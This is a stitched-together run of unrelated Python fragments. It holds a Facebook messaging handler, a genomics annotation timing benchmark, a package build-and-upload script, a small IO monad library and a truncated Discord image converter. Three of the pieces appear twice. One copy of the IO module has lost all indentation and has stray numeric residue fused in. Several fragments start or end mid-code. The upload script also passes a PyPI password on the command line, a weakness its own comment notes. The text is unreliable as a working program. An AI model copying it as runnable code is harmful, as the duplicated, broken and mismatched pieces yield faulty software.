        if message["platform"] == "facebook":
            self.facebook_subscriber_event_processor.process(subscriber_event_message=message)
        else:
            AllSubscribers.logger.info("Unknown message: {}".format(message))

    def process_subscription_message(self, message):
        """Send a subscription message via Facebook and persist the attempt."""
        if message["platform"] != "facebook":
            # Unsupported platform: no DB lookup needed (the original queried
            # Subscription before checking the platform).
            AllSubscribers.logger.info("Unknown message: {}".format(message))
            return
        subscription = Subscription.objects.get(platform=message["platform"],
                                                platform_identifier=message["platform_identifier"])
        AllSubscribers.logger.info("Sending message: {message} to user: {user}".format(
            message=message["text"], user=message["platform_identifier"]))
        subscription_attempt = SubscriptionAttempt.objects.create(
            subscription=subscription, message=message["text"][:2048])
        response = self.facebook_messager.send(
            recipient_id=message["platform_identifier"], message=message["text"])
        SubscriptionAttemptResult.objects.create(
            subscription_attempt=subscription_attempt,
            successful=response.status_code == 200,
            response=response.text[:2048])
import sys
import os
import time
import toolshed as ts
# Annotation sources to benchmark. VCF sources declare INFO `fields`;
# BED sources declare 1-based `columns` plus a header stub (`h`) and a
# bcftools column spec (`c`). `names`/`ops` describe the derived outputs.
files = [
    dict(file="ESP6500SI.all.snps_indels.tidy.v2.vcf.gz",
         fields=["EA_AC", "AA_AC"],
         names=["esp_ea", "esp_aa"],
         ops=["first", "first"]),
    dict(file="ExAC.r0.3.sites.vep.tidy.vcf.gz",
         fields=["AC_Adj", "AC_Het", "AC_Hom", "AC_NFE"],
         names=["exac_AC_Adj", "exac_AC_Het", "exac_AC_Hom", "exac_AC_NFE"],
         ops=["first", "first", "first", "first"]),
    dict(file="hg19_fitcons_fc-i6-0_V1-01.bed.gz",
         columns=[4],
         names=["fitcons_mean"],
         ops=["mean"],
         h="fitcons.hdr",
         c="CHROM,FROM,TO,FITCONS"),
    dict(file="ALL.wgs.phase3_shapeit2_mvncall_integrated_v5a.20130502.sites.tidy.vcf.gz",
         fields=["EAS_AF", "AMR_AF"],
         names=["1kg_eas_af", "1kg_amr_af"],
         ops=["first", "first"]),
    dict(file="GRCh37-gms-mappability.vcf.gz",
         fields=["GMS_illumina"],
         names=["gms_mappapility"],  # NOTE(review): likely typo for "gms_mappability"; kept, it names an output field
         ops=["first"]),
    dict(file="clinvar_20150305.tidy.vcf.gz",
         fields=["CLNHGVS"],
         names=["clinvar_hgvs"],
         ops=["first"]),
    dict(file="cosmic-v68-GRCh37.tidy.vcf.gz",
         fields=["ID"],
         names=["cosmic_id"],
         ops=["concat"]),
    dict(file="dbsnp.b141.20140813.hg19.tidy.vcf.gz",
         fields=["RS"],
         names=["dbsnp_id"],
         ops=["concat"]),
    dict(file="hg19.gerp.elements.bed.gz",
         columns=[4],
         names=["gerp"],
         ops=["mean"],
         h="gerp.hdr",
         c="CHROM,FROM,TO,GERP"),
]
def get():
    """Download each annotation file (plus its .tbi index) into ./data,
    sorting and re-compressing on the way; files already present are skipped."""
    base = "http://s3.amazonaws.com/gemini-annotations/"
    try:
        os.mkdir("data")
    except OSError:
        pass  # directory already exists
    for entry in files:
        fname = entry['file']
        if os.path.exists("data/" + fname) and os.path.exists("data/" + fname + ".tbi"):
            continue
        cmd = ("|wget -O tmp.tt.gz {base}{f} && sleep 2 && ./vcfsort.sh tmp.tt.gz | bgzip -c > data/{f} && sleep 2 && tabix -f data/{f}; rm -f tmp.tt.gz".format(base=base, f=fname))
        list(ts.nopen(cmd))
get()
def asanno(d):
    """Render one [[annotation]] TOML stanza for entry `d`.

    VCF entries carry `fields`; BED entries carry `columns`.
    """
    tail = "fields={fields}" if "fields" in d else "columns={columns}"
    parts = ["", "[[annotation]]", 'file="{file}"', "names={names}",
             "ops={ops}", tail, ""]
    return "\n".join(parts).format(**d)
def asbcf(d):
    """Build the equivalent `bcftools annotate` command for entry `d`.

    Fix: no longer mutates the caller's dict -- the original wrote the
    derived 'cols'/'hdr' keys back into `d` as a side effect.
    """
    cols = "+" + ",+".join(d['fields']) if 'fields' in d else d["c"]
    hdr = "-h " + d['h'] if 'h' in d else ""
    return 'bcftools annotate -a {DATA}/{file} -c "{cols}" {hdr}'.format(
        DATA=d['DATA'], file=d['file'], cols=cols, hdr=hdr)
# Write the one-line VCF header stubs needed when annotating from BED files.
with open('fitcons.hdr', 'w') as fh:
    fh.write('##INFO=<ID=FITCONS,Number=1,Type=Float,Description="FITCONS VALUE">\n')
with open('gerp.hdr', 'w') as fh:
    fh.write('##INFO=<ID=GERP,Number=1,Type=Float,Description="GERP VALUE">\n')
# Emit the vcfanno config covering every annotation source.
toml = "compare.toml"
with open(toml, "w") as fh:
    for d in files:
        fh.write(asanno(d))
DATA = 'data'
QUERY = "data/ExAC.r0.3.sites.vep.tidy.vcf.gz"  # query VCF annotated by every tool
for f in files:
    # asbcf/vcfanno command templates expect these keys on every entry
    f['DATA'] = DATA
    f['QUERY'] = QUERY
commands = [asbcf(f) for f in files]
query = QUERY.format(DATA=DATA)  # no-op: QUERY contains no placeholders -- TODO confirm intent
fnames = [f['DATA'] + "/" + f['file'] for f in files]
bedtools_cmd = ("bedtools intersect -sorted -sortout -wao -a {query} -b " + " -b ".join(fnames)).format(query=query)
# TODO: send to file to match bcftools and vcfanno
fh = open("timing.txt", "w")  # results table: method, step index, seconds, procs
print >>fh, "method\ti\tseconds\tprocs"
t = time.time()
list(ts.nopen("|%s | bgzip -c > /tmp/trash.gz" % bedtools_cmd))  # time bedtools once
print >>fh, "bedtools\t%d\t%.2f\t1" % (len(commands), time.time() - t)
# Time bcftools (sequential, once, since it cannot parallelise across
# annotations) and vcfanno at several -p levels. Fix: dataset-extraction
# residue fused onto the final line removed; logic otherwise unchanged.
for procs in (1, 4, 8, 12):
    if procs == 1:
        # Chain the bcftools commands, feeding each step's output to the next.
        tottime = 0
        for i in range(len(commands)):
            out = "tmp%d.vcf.gz" % i
            try:
                os.unlink("tmp%d.vcf.gz" % (i - 2))  # drop stale intermediates
            except OSError:
                pass
            query = QUERY.format(DATA=DATA) if i == 0 else ("tmp%d.vcf.gz" % (i - 1))
            cmd = commands[i] + " {query} | bgzip -c > {out}; tabix {out} ".format(DATA=DATA, query=query, out=out)
            print >>sys.stderr, cmd
            t = time.time()
            res = list(ts.nopen("|%s" % cmd))
            t1 = time.time()
            tottime += t1 - t
            # cumulative time after each chained annotation step
            print >>fh, "bcftools\t%d\t%.2f\t1" % (i + 1, tottime)
            sys.stdout.flush()
    vcmd = "vcfanno -p {procs} -base-path {DATA} {toml} {QUERY} | bgzip -c > /dev/null".format(
        DATA=DATA, procs=procs, QUERY=QUERY, toml=toml)
    print >>sys.stderr, vcmd
    t = time.time()
    res = list(ts.nopen("|%s" % vcmd))
    t1 = time.time()
    # i deliberately carries over from the bcftools loop: the annotation count
    print >>fh, "vcfanno\t%d\t%.2f\t%d" % (i + 1, t1 - t, procs)
import os
import time
import toolshed as ts
# Annotation sources to benchmark. VCF sources declare INFO `fields`;
# BED sources declare 1-based `columns` plus a header stub (`h`) and a
# bcftools column spec (`c`). `names`/`ops` describe the derived outputs.
files = [
    dict(file="ESP6500SI.all.snps_indels.tidy.v2.vcf.gz",
         fields=["EA_AC", "AA_AC"],
         names=["esp_ea", "esp_aa"],
         ops=["first", "first"]),
    dict(file="ExAC.r0.3.sites.vep.tidy.vcf.gz",
         fields=["AC_Adj", "AC_Het", "AC_Hom", "AC_NFE"],
         names=["exac_AC_Adj", "exac_AC_Het", "exac_AC_Hom", "exac_AC_NFE"],
         ops=["first", "first", "first", "first"]),
    dict(file="hg19_fitcons_fc-i6-0_V1-01.bed.gz",
         columns=[4],
         names=["fitcons_mean"],
         ops=["mean"],
         h="fitcons.hdr",
         c="CHROM,FROM,TO,FITCONS"),
    dict(file="ALL.wgs.phase3_shapeit2_mvncall_integrated_v5a.20130502.sites.tidy.vcf.gz",
         fields=["EAS_AF", "AMR_AF"],
         names=["1kg_eas_af", "1kg_amr_af"],
         ops=["first", "first"]),
    dict(file="GRCh37-gms-mappability.vcf.gz",
         fields=["GMS_illumina"],
         names=["gms_mappapility"],  # NOTE(review): likely typo for "gms_mappability"; kept, it names an output field
         ops=["first"]),
    dict(file="clinvar_20150305.tidy.vcf.gz",
         fields=["CLNHGVS"],
         names=["clinvar_hgvs"],
         ops=["first"]),
    dict(file="cosmic-v68-GRCh37.tidy.vcf.gz",
         fields=["ID"],
         names=["cosmic_id"],
         ops=["concat"]),
    dict(file="dbsnp.b141.20140813.hg19.tidy.vcf.gz",
         fields=["RS"],
         names=["dbsnp_id"],
         ops=["concat"]),
    dict(file="hg19.gerp.elements.bed.gz",
         columns=[4],
         names=["gerp"],
         ops=["mean"],
         h="gerp.hdr",
         c="CHROM,FROM,TO,GERP"),
]
def get():
    """Download each annotation file (plus its .tbi index) into ./data,
    sorting and re-compressing on the way; files already present are skipped."""
    base = "http://s3.amazonaws.com/gemini-annotations/"
    try:
        os.mkdir("data")
    except OSError:
        pass  # directory already exists
    for entry in files:
        fname = entry['file']
        if os.path.exists("data/" + fname) and os.path.exists("data/" + fname + ".tbi"):
            continue
        cmd = ("|wget -O tmp.tt.gz {base}{f} && sleep 2 && ./vcfsort.sh tmp.tt.gz | bgzip -c > data/{f} && sleep 2 && tabix -f data/{f}; rm -f tmp.tt.gz".format(base=base, f=fname))
        list(ts.nopen(cmd))
get()
def asanno(d):
    """Render one [[annotation]] TOML stanza for entry `d`.

    VCF entries carry `fields`; BED entries carry `columns`.
    """
    tail = "fields={fields}" if "fields" in d else "columns={columns}"
    parts = ["", "[[annotation]]", 'file="{file}"', "names={names}",
             "ops={ops}", tail, ""]
    return "\n".join(parts).format(**d)
def asbcf(d):
    """Build the equivalent `bcftools annotate` command for entry `d`.

    Fix: no longer mutates the caller's dict -- the original wrote the
    derived 'cols'/'hdr' keys back into `d` as a side effect.
    """
    cols = "+" + ",+".join(d['fields']) if 'fields' in d else d["c"]
    hdr = "-h " + d['h'] if 'h' in d else ""
    return 'bcftools annotate -a {DATA}/{file} -c "{cols}" {hdr}'.format(
        DATA=d['DATA'], file=d['file'], cols=cols, hdr=hdr)
# Write the one-line VCF header stubs needed when annotating from BED files.
with open('fitcons.hdr', 'w') as fh:
    fh.write('##INFO=<ID=FITCONS,Number=1,Type=Float,Description="FITCONS VALUE">\n')
with open('gerp.hdr', 'w') as fh:
    fh.write('##INFO=<ID=GERP,Number=1,Type=Float,Description="GERP VALUE">\n')
# Emit the vcfanno config covering every annotation source.
toml = "compare.toml"
with open(toml, "w") as fh:
    for d in files:
        fh.write(asanno(d))
DATA = 'data'
QUERY = "data/ExAC.r0.3.sites.vep.tidy.vcf.gz"  # query VCF annotated by every tool
for f in files:
    # asbcf/vcfanno command templates expect these keys on every entry
    f['DATA'] = DATA
    f['QUERY'] = QUERY
commands = [asbcf(f) for f in files]
query = QUERY.format(DATA=DATA)  # no-op: QUERY contains no placeholders -- TODO confirm intent
fnames = [f['DATA'] + "/" + f['file'] for f in files]
bedtools_cmd = ("bedtools intersect -sorted -sortout -wao -a {query} -b " + " -b ".join(fnames)).format(query=query)
# TODO: send to file to match bcftools and vcfanno
fh = open("timing.txt", "w")  # results table: method, step index, seconds, procs
print >>fh, "method\ti\tseconds\tprocs"
t = time.time()
list(ts.nopen("|%s | bgzip -c > /tmp/trash.gz" % bedtools_cmd))  # time bedtools once
print >>fh, "bedtools\t%d\t%.2f\t1" % (len(commands), time.time() - t)
# Time bcftools (sequential, once, since it cannot parallelise across
# annotations) and vcfanno at several -p levels. Fix: dataset-extraction
# residue fused onto the final line removed; logic otherwise unchanged.
for procs in (1, 4, 8, 12):
    if procs == 1:
        # Chain the bcftools commands, feeding each step's output to the next.
        tottime = 0
        for i in range(len(commands)):
            out = "tmp%d.vcf.gz" % i
            try:
                os.unlink("tmp%d.vcf.gz" % (i - 2))  # drop stale intermediates
            except OSError:
                pass
            query = QUERY.format(DATA=DATA) if i == 0 else ("tmp%d.vcf.gz" % (i - 1))
            cmd = commands[i] + " {query} | bgzip -c > {out}; tabix {out} ".format(DATA=DATA, query=query, out=out)
            print >>sys.stderr, cmd
            t = time.time()
            res = list(ts.nopen("|%s" % cmd))
            t1 = time.time()
            tottime += t1 - t
            # cumulative time after each chained annotation step
            print >>fh, "bcftools\t%d\t%.2f\t1" % (i + 1, tottime)
            sys.stdout.flush()
    vcmd = "vcfanno -p {procs} -base-path {DATA} {toml} {QUERY} | bgzip -c > /dev/null".format(
        DATA=DATA, procs=procs, QUERY=QUERY, toml=toml)
    print >>sys.stderr, vcmd
    t = time.time()
    res = list(ts.nopen("|%s" % vcmd))
    t1 = time.time()
    # i deliberately carries over from the bcftools loop: the annotation count
    print >>fh, "vcfanno\t%d\t%.2f\t%d" % (i + 1, t1 - t, procs)
import os
import shutil
from base_automation import report
from base_automation.utilities import shared_utilities
@report.utils.step('delete dist directory')
def delete_dist_dir(dist_dir):
    """Remove the build output directory if present.

    Fix: os.path.isdir already implies existence, so the original's
    extra os.path.exists check was redundant.
    """
    if os.path.isdir(dist_dir):
        shutil.rmtree(dist_dir)
    else:
        print("The dist directory does not exist")
@report.utils.step("build")
def build():
    """Install the package in develop mode, upgrade build tooling, build dists."""
    for command in ("python setup.py develop",
                    "python -m pip install --upgrade pip",
                    "python -m pip install --upgrade build",
                    "python -m build"):
        shared_utilities.terminal_command(command)
@report.utils.step("upload artifact to {azure_feed_name}")
def upload_azure_artifact(azure_feed_name):
    """Build sdist/wheel and upload them to the named Azure Artifacts feed.

    Fix: this function was defined twice, byte for byte; the duplicate
    definition (which silently shadowed the first) has been removed.
    """
    upload_commands = ["python setup.py sdist bdist_wheel",
                       f"twine upload -r {azure_feed_name} dist/*"]
    for command in upload_commands:
        shared_utilities.terminal_command(command)
@report.utils.step("upload pypi to {repository_url}")
def upload_pypi_artifact():
    """Build sdist/wheel and upload them to PyPI via twine.

    Fix: the original appended the PyPI username and password as further
    *commands*, which would have executed the raw credentials in the
    shell. They are now passed to twine itself.
    NOTE(review): secrets on the command line are visible in the process
    list; prefer TWINE_USERNAME/TWINE_PASSWORD environment variables.
    NOTE(review): the step label references {repository_url}, which is
    not a parameter of this function -- confirm how report.utils.step
    formats it.
    """
    user = shared_utilities.get_environment_variable('pypi-user')
    password = shared_utilities.get_environment_variable('pypi-password')
    upload_commands = [
        "python setup.py sdist bdist_wheel",
        "twine upload --repository-url https://upload.pypi.org/legacy/ "
        f"-u {user} -p {password} dist/*",
    ]
    for command in upload_commands:
        shared_utilities.terminal_command(command)
@report.utils.feature('Build & Upload New Artifact To Azure')  # A sub-function function at large
@report.utils.severity("normal")  # Priority of test cases - 'blocker', 'critical', 'normal', 'minor', 'trivial'
def run_process(dist_dir, azure_feeds: list = None, azure_artifact: bool = False, pypi_artifact: bool = False):
    """Clean the dist dir, build, then optionally upload to PyPI and/or Azure.

    Fix: guards against azure_artifact=True with azure_feeds=None, which
    previously raised TypeError when iterating None.
    """
    delete_dist_dir(dist_dir)
    build()
    if pypi_artifact:
        upload_pypi_artifact()
    if azure_artifact:
        for feed in azure_feeds or []:
            upload_azure_artifact(feed)
import shutil
from base_automation import report
from base_automation.utilities import shared_utilities
@report.utils.step('delete dist directory')
def delete_dist_dir(dist_dir):
    """Remove the build output directory if present.

    Fix: os.path.isdir already implies existence, so the original's
    extra os.path.exists check was redundant.
    """
    if os.path.isdir(dist_dir):
        shutil.rmtree(dist_dir)
    else:
        print("The dist directory does not exist")
@report.utils.step("build")
def build():
    """Install the package in develop mode, upgrade build tooling, build dists."""
    for command in ("python setup.py develop",
                    "python -m pip install --upgrade pip",
                    "python -m pip install --upgrade build",
                    "python -m build"):
        shared_utilities.terminal_command(command)
@report.utils.step("upload artifact to {azure_feed_name}")
def upload_azure_artifact(azure_feed_name):
    """Build sdist/wheel and upload them to the named Azure Artifacts feed.

    Fix: this function was defined twice, byte for byte; the duplicate
    definition (which silently shadowed the first) has been removed.
    """
    upload_commands = ["python setup.py sdist bdist_wheel",
                       f"twine upload -r {azure_feed_name} dist/*"]
    for command in upload_commands:
        shared_utilities.terminal_command(command)
@report.utils.step("upload pypi to {repository_url}")
def upload_pypi_artifact():
    """Build sdist/wheel and upload them to PyPI via twine.

    Fix: the original appended the PyPI username and password as further
    *commands*, which would have executed the raw credentials in the
    shell. They are now passed to twine itself.
    NOTE(review): secrets on the command line are visible in the process
    list; prefer TWINE_USERNAME/TWINE_PASSWORD environment variables.
    NOTE(review): the step label references {repository_url}, which is
    not a parameter of this function -- confirm how report.utils.step
    formats it.
    """
    user = shared_utilities.get_environment_variable('pypi-user')
    password = shared_utilities.get_environment_variable('pypi-password')
    upload_commands = [
        "python setup.py sdist bdist_wheel",
        "twine upload --repository-url https://upload.pypi.org/legacy/ "
        f"-u {user} -p {password} dist/*",
    ]
    for command in upload_commands:
        shared_utilities.terminal_command(command)
@report.utils.feature('Build & Upload New Artifact To Azure')  # A sub-function function at large
@report.utils.severity("normal")  # Priority of test cases - 'blocker', 'critical', 'normal', 'minor', 'trivial'
def run_process(dist_dir, azure_feeds: list = None, azure_artifact: bool = False, pypi_artifact: bool = False):
    """Clean the dist dir, build, then optionally upload to PyPI and/or Azure.

    Fix: guards against azure_artifact=True with azure_feeds=None, which
    previously raised TypeError when iterating None. Extraction residue
    fused onto the final line removed.
    """
    delete_dist_dir(dist_dir)
    build()
    if pypi_artifact:
        upload_pypi_artifact()
    if azure_artifact:
        for feed in azure_feeds or []:
            upload_azure_artifact(feed)
from typing import Any, Callable, Generic, TypeVar, Tuple, Optional
from .typing import Applicative
from .typing import Functor
from .typing import Monad
from .util import indent as ind
TSource = TypeVar("TSource")  # wrapped value type
TResult = TypeVar("TResult")  # result type after map/bind
class IO(Generic[TSource]):
    """A description of an effectful computation.

    An IO action is inert data: nothing happens until ``run`` is invoked
    with a "world" token. This base class represents a pure ``Return``.
    """

    def __init__(self, value: Optional[TSource] = None) -> None:
        """Wrap ``value`` in an IO action."""
        super().__init__()
        self._value = value

    @classmethod
    def unit(cls, value: TSource):
        """Lift a plain value into an IO action (monadic return)."""
        return cls(value)

    def bind(self, func: Callable[[Optional[TSource]], "IO[Optional[TResult]]"]) -> "IO[Optional[TResult]]":
        """IO a -> (a -> IO b) -> IO b."""
        return func(self._value)

    @classmethod
    def pure(
        cls, value: Optional[Callable[[Optional[TSource]], Optional[TResult]]]
    ) -> "IO[Optional[Callable[[Optional[TSource]], Optional[TResult]]]]":
        """Lift a function into an IO action (applicative pure)."""
        return IO(value)

    def apply(
        self: "IO[Optional[Callable[[Optional[TSource]], Optional[TResult]]]]", something: "IO[Optional[TSource]]"
    ) -> "IO[Optional[TResult]]":
        """Apply the wrapped function over another action's value."""
        assert self._value is not None
        return something.map(self._value)

    def map(self, func: Callable[[Optional[TSource]], Optional[TResult]]) -> "IO[Optional[TResult]]":
        """Functor map: transform the wrapped value."""
        return IO(func(self._value))

    def run(self, world: int) -> Optional[TSource]:
        """Run the action; a plain Return just yields its value."""
        return self._value

    def __or__(self, func):
        """``|`` is bind, standing in for Haskell's ``>>=`` operator."""
        return self.bind(func)

    def __call__(self, world: int = 0) -> Any:
        """Nothing more to run."""
        return self.run(world)

    def __str__(self, m: int = 0, n: int = 0) -> str:
        # m: indent level, n: fresh-variable counter (used by subclasses)
        return "%sReturn %s" % (ind(m), [self._value])

    def __repr__(self) -> str:
        return self.__str__()
class Put(IO):
    """An action that prints a string, then continues with another action.

    The payload is a ``(text, next_action)`` pair.
    """

    def __init__(self, text: str, action: IO) -> None:
        super().__init__((text, action))

    def bind(self, func: Callable[[Optional[TSource]], IO[Optional[TResult]]]) -> "Put":
        """IO a -> (a -> IO b) -> IO b"""
        assert self._value is not None
        text, nxt = self._value
        return Put(text, nxt.bind(func))

    def map(self, func: Callable[[Optional[TSource]], Optional[TResult]]) -> "Put":
        """Functor map over the continuation: Put s (fmap f io)."""
        assert self._value is not None
        text, nxt = self._value
        return Put(text, nxt.map(func))

    def run(self, world: int) -> IO:
        """Print the text, then run the continuation in the successor world."""
        assert self._value is not None
        text, nxt = self._value
        return nxt(world=pure_print(world, text))

    def __call__(self, world: int = 0) -> IO:
        return self.run(world)

    def __str__(self, m: int = 0, n: int = 0) -> str:
        assert self._value is not None
        text, nxt = self._value
        rendered = nxt.__str__(m + 1, n)
        return '%sPut ("%s",\n%s\n%s)' % (ind(m), text, rendered, ind(m))
class Get(IO):
    """An action holding a continuation from an input string to the next IO."""

    def __init__(self, func: Callable[[str], IO]) -> None:
        super().__init__(func)

    def bind(self, func: Callable[[Any], IO]) -> IO:
        """IO a -> (a -> IO b) -> IO b"""
        assert self._value is not None
        cont = self._value
        return Get(lambda text: cont(text).bind(func))

    def map(self, func: Callable[[Any], Any]) -> "Get":
        """Functor map inside the continuation: Get (\\s -> fmap f (g s))."""
        assert self._value is not None
        cont = self._value
        return Get(lambda text: cont(text).map(func))

    def run(self, world: int) -> IO:
        """Read a line of input, then run the continuation in the new world."""
        assert self._value is not None
        cont = self._value
        new_world, text = pure_input(world)
        return cont(text)(world=new_world)

    def __call__(self, world: int = 0) -> IO:
        return self.run(world)

    def __str__(self, m: int = 0, n: int = 0) -> str:
        assert self._value is not None
        cont = self._value
        fresh = "x%s" % n  # fresh variable name for pretty-printing
        rendered = cont(fresh).__str__(m + 1, n + 1)
        return "%sGet (%s => \n%s\n%s)" % (ind(m), fresh, rendered, ind(m))
class ReadFile(IO):
    """An action that reads ``filename`` and feeds its contents to a
    continuation producing the next IO action."""

    def __init__(self, filename: str, func: Callable[[str], IO]) -> None:
        super().__init__((filename, func))
        self.open_func = open  # injectable for testing
        # Kept for backward compatibility with the original accessor.
        self._get_value = lambda: (filename, func)

    def bind(self, func: Callable[[Any], IO]) -> IO:
        """IO a -> (a -> IO b) -> IO b"""
        filename, g = self._get_value()
        return ReadFile(filename, lambda s: g(s).bind(func))

    def map(self, func: Callable[[Any], Any]) -> IO:
        # Fix: the original returned a Get action here, which dropped the
        # filename and turned a mapped file read into a stdin read.
        filename, g = self._get_value()
        return ReadFile(filename, lambda s: g(s).map(func))

    def run(self, world: int) -> IO:
        """Open the file, read it all, and run the continuation."""
        filename, func = self._get_value()
        f = self.open_func(filename)
        action = func(f.read())  # NOTE(review): file handle is never closed -- confirm intent
        return action(world=world + 1)

    def __call__(self, world: int = 0) -> IO:
        return self.run(world)

    def __str__(self, m: int = 0, n: int = 0) -> str:
        filename, g = self._get_value()
        i = "x%s" % n
        a = g(i).__str__(m + 2, n + 1)
        return '%sReadFile ("%s",%s => \n%s\n%s)' % (ind(m), filename, i, a, ind(m))
def get_line() -> IO:
    """Action that reads one line from stdin and returns it."""
    return Get(IO)  # the IO constructor IS the `text -> IO(text)` continuation


def put_line(string: str) -> IO:
    """Action that prints ``string``, then continues with an empty Return."""
    return Put(string, IO(None))


def read_file(filename: str) -> IO:
    """Action that reads ``filename`` and returns its contents."""
    return ReadFile(filename, IO)
def pure_print(world: int, text: str) -> int:
    """Perform the actual print effect; returns the successor world token."""
    print(text)  # Impure. NOTE: If you see this line you need to wash your hands
    return world + 1


def pure_input(world: int) -> Tuple[int, str]:
    """Perform the actual stdin read; returns (new world, line read)."""
    text = input()  # Impure. NOTE: If you see this line you need to wash your hands
    return (world + 1, text)
# Import-time sanity checks: each action class satisfies the typeclass
# protocols. NOTE(review): these isinstance checks run on the classes
# themselves, which presumably relies on the custom protocol machinery in
# .typing -- confirm. Fix: dataset-extraction residue fused onto the final
# line removed; the assertions themselves are unchanged.
assert isinstance(IO, Functor)
assert isinstance(IO, Applicative)
assert isinstance(IO, Monad)
assert isinstance(Put, Functor)
assert isinstance(Put, Applicative)
assert isinstance(Put, Monad)
assert isinstance(Get, Functor)
assert isinstance(Get, Applicative)
assert isinstance(Get, Monad)
assert isinstance(ReadFile, Functor)
assert isinstance(ReadFile, Applicative)
assert isinstance(ReadFile, Monad)
from .typing import Applicative
from .typing import Functor
from .typing import Monad
from .util import indent as ind
TSource = TypeVar("TSource")  # wrapped value type
TResult = TypeVar("TResult")  # result type after map/bind
class IO(Generic[TSource]):
    """A description of an effectful computation.

    An IO action is inert data: nothing happens until ``run`` is invoked
    with a "world" token. This base class represents a pure ``Return``.
    """

    def __init__(self, value: Optional[TSource] = None) -> None:
        """Wrap ``value`` in an IO action."""
        super().__init__()
        self._value = value

    @classmethod
    def unit(cls, value: TSource):
        """Lift a plain value into an IO action (monadic return)."""
        return cls(value)

    def bind(self, func: Callable[[Optional[TSource]], "IO[Optional[TResult]]"]) -> "IO[Optional[TResult]]":
        """IO a -> (a -> IO b) -> IO b."""
        return func(self._value)

    @classmethod
    def pure(
        cls, value: Optional[Callable[[Optional[TSource]], Optional[TResult]]]
    ) -> "IO[Optional[Callable[[Optional[TSource]], Optional[TResult]]]]":
        """Lift a function into an IO action (applicative pure)."""
        return IO(value)

    def apply(
        self: "IO[Optional[Callable[[Optional[TSource]], Optional[TResult]]]]", something: "IO[Optional[TSource]]"
    ) -> "IO[Optional[TResult]]":
        """Apply the wrapped function over another action's value."""
        assert self._value is not None
        return something.map(self._value)

    def map(self, func: Callable[[Optional[TSource]], Optional[TResult]]) -> "IO[Optional[TResult]]":
        """Functor map: transform the wrapped value."""
        return IO(func(self._value))

    def run(self, world: int) -> Optional[TSource]:
        """Run the action; a plain Return just yields its value."""
        return self._value

    def __or__(self, func):
        """``|`` is bind, standing in for Haskell's ``>>=`` operator."""
        return self.bind(func)

    def __call__(self, world: int = 0) -> Any:
        """Nothing more to run."""
        return self.run(world)

    def __str__(self, m: int = 0, n: int = 0) -> str:
        # m: indent level, n: fresh-variable counter (used by subclasses)
        return "%sReturn %s" % (ind(m), [self._value])

    def __repr__(self) -> str:
        return self.__str__()
class Put(IO):
"""The Put action.
A container holding a string to be printed to stdout, followed by
another IO Action.
"""
def __init__(self, text: str, action: IO) -> None:
super().__init__((text, action))
def bind(self, func: Callable[[Optional[TSource]], IO[Optional[TResult]]]) -> "Put":
"""IO a -> (a -> IO b) -> IO b"""
assert self._value is not None
text, a = self._value
return Put(text, a.bind(func))
def map(self, func: Callable[[Optional[TSource]], Optional[TResult]]) -> "Put":
# Put s (fmap f io)
assert self._value is not None
text, action = self._value
return Put(text, action.map(func))
def run(self, world: int) -> IO:
"""Run IO action"""
assert self._value is not None
text, action = self._value
new_world = pure_print(world, text)
return action(world=new_world)
def __call__(self, world: int = 0) -> IO:
return self.run(world)
def __str__(self, m: int = 0, n: int = 0) -> str:
assert self._value is not None
s, io = self._value
a = io.__str__(m + 1, n)
return '%sPut ("%s",\n%s\n%s)' % (ind(m), s, a, ind(m))
class Get(IO):
"""A container holding a function from string -> IO, which can
be applied to whatever string is read from stdin.
"""
def __init__(self, func: Callable[[str], IO]) -> None:
super().__init__(func)
def bind(self, func: Callable[[Any], IO]) -> IO:
"""IO a -> (a -> IO b) -> IO b"""
assert self._value is not None
g = self._value
return Get(lambda text: g(text).bind(func))
def map(self, func: Callable[[Any], Any]) -> "Get":
# Get (\s -> fmap f (g s))
assert self._value is not None
g = self._value
return Get(lambda s: g(s).map(func))
def run(self, world: int) -> IO:
"""Run IO Action"""
assert self._value is not None
func = self._value
new_world, text = pure_input(world)
action = func(text)
return action(world=new_world)
def __call__(self, world: int = 0) -> IO:
return self.run(world)
def __str__(self, m: int = 0, n: int = 0) -> str:
assert self._value is not None
g = self._value
i = "x%s" % n
a = g(i).__str__(m + 1, n + 1)
return "%sGet (%s => \n%s\n%s)" % (ind(m), i, a, ind(m))
class ReadFile(IO):
"""A container holding a filename and a function from string -> IO,
which can be applied to whatever string is read from the file.
"""
def __init__(self, filename: str, func: Callable[[str], IO]) -> None:
super().__init__((filename, func))
self.open_func = open
self._get_value = lambda: (filename, func)
def bind(self, func: Callable[[Any], IO]) -> IO:
"""IO a -> (a -> IO b) -> IO b"""
filename, g = self._get_value()
return ReadFile(filename, lambda s: g(s).bind(func))
def map(self, func: Callable[[Any], Any]) -> IO:
# Get (\s -> fmap f (g s))
filename, g = self._get_value()
return Get(lambda s: g(s).map(func))
def run(self, world: int) -> IO:
"""Run IO Action"""
filename, func = self._get_value()
f = self.open_func(filename)
action = func(f.read())
return action(world=world + 1)
def __call__(self, world: int = 0) -> IO:
return self.run(world)
def __str__(self, m: int = 0, n: int = 0) -> str:
filename, g = self._get_value()
i = "x%s" % n
a = g(i).__str__(m + 2, n + 1)
return '%sReadFile ("%s",%s => \n%s\n%s)' % (ind(m), filename, i, a, ind(m))
def get_line() -> IO:
return Get(lambda text: IO(text))
def put_line(string: str) -> IO:
return Put(string, IO(None))
def read_file(filename: str) -> IO:
return ReadFile(filename, lambda text: IO(text))
def pure_print(world: int, text: str) -> int:
print(text) # Impure. NOTE: If you see this line you need to wash your hands
return world + 1
def pure_input(world: int) -> Tuple[int, str]:
text = input() # Impure. NOTE: If you see this line you need to wash your hands
return (world + 1, text)
assert isinstance(IO, Functor)
assert isinstance(IO, Applicative)
assert isinstance(IO, Monad)
assert isinstance(Put, Functor)
assert isinstance(Put, Applicative)
assert isinstance(Put, Monad)
assert isinstance(Get, Functor)
assert isinstance(Get, Applicative)
assert isinstance(Get, Monad)
assert isinstance(ReadFile, Functor)
assert isinstance(ReadFile, Applicative)
assert isinstance(ReadFile, Monad) | 0.895705 | 0.428473 |
import re
from discord.ext.commands.converter import Converter
from discord.ext.commands.errors import BadArgument
IMAGE_LINKS = re.compile(r"(https?:\/\/[^\"\'\s]*\.(?:png|jpg|jpeg|gif|png|svg)(\?size=[0-9]*)?)")
MENTION_REGEX = re.compile(r"<@!?([0-9]+)>")
ID_REGEX = re.compile(r"[0-9]{17,}")
class ImageFinder(Converter):
"""This is a class to convert notsobots image searching capabilities into a more general
converter class."""
async def convert(self, ctx, argument):
attachments = ctx.message.attachments
mentions = MENTION_REGEX.finditer(argument)
matches = IMAGE_LINKS.finditer(argument)
ids = ID_REGEX.finditer(argument)
